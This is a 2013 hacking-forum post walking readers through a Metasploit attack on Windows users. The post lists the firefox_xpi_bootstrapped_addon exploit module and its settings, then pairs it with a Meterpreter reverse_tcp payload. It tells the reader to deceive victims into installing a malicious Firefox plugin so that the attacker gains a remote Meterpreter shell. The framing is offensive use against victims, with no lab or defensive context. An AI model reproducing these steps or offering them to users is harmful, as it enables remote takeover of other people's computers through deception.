Login Register






Exploit Windows with-Firefox filter_list
Author
Message
Exploit Windows with-Firefox #1
Hi.. HC Cool
I want a share tutorial how to Exploit Windows with Firefox addons/Plugins
I hope I am not repost Biggrin

oke let's try :dance:
now open your Msfconsole

> use exploit/multi/browser/firefox_xpi_bootstrapped_addon
> check options

[Image: options.png]

now settings you should set

> set ADDONNAME
> set SRVHOST [your IP local]
> set SRVPORT [locap Port]
> set uripath [example : www.name.com/uripath]

> use payload/windows/meterpreter/reverse_tcp
> set LHOST [IP local]
> exploit

[Image: in+set.png]


and,.now run exploit


this is screenshot when your victims click your trap

[Image: firefox1.png]

[Image: plugins.png]

make the victim believe with your plugins ,so that victims of plugins to install his

if Plugins was accept by victims,you will bi come to Meterpreter stage

[Image: meterpreter.png]


this my firts tread,.. thank's Biggrin
and,sorry for my bad english
:bye: :bye:

Reply





Messages In This Thread
Exploit Windows with-Firefox - by Clound_Carbelius - 07-12-2013, 04:49 AM